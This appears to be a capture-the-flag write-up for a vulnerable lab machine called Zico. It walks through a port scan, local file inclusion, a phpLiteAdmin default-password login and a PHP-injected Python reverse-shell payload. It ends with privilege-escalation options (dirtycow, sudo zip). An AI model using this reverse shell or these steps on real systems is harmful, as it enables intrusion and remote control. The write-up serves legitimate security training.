Zico is trying to build his website but is having some trouble in choosing what CMS to use. After some tries on a few popular ones, he decided to build his own. Was that a good idea? Hint: Enumerate, enumerate, and enumerate!
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack 80/tcp open http syn-ack 111/tcp open rpcbind syn-ack 554/tcp open rtsp syn-ack 7070/tcp open realserver syn-ack
We only really have port 80 that’s useful to us. We can very easily find our first exploit. We have
view.php?page= that we can find by navigating the main page, we can use LFI to get different files:
Even while fuzzing, we don’t seem to be able to find anything hugely useful. It seems php files that get included are executed rather than read out. We can try fuzzing directories and find
test_db.php takes us a login for phpLiteAdmin, googling this we can try find a relevant CVE:
We can login using the password
admin and start creating queries to perform RCE. On the left side of the page, we can create a new database. We create one called
hack.php. Next is to create a table (called it whatever you want) and inject your PHP code into the default value of a field:
<?php exec("python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"<your ip>\",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'") ?>
We go to insert a field with this and catch it with a netcat listener.
We have a wordpress install in Zico’s home directory, we simply read the config file and get the wpconfig for his password:
We have 3 options for priv-esc. This box is vulnerable to the dirtycow exploit but we also have two sudo entries that allow us to execute commands as root.
TAR and ZIP would just be it’s usual GTFOBins exploit, I’ll go with ZIP. The binary allows us to zip files and run a command during the compression: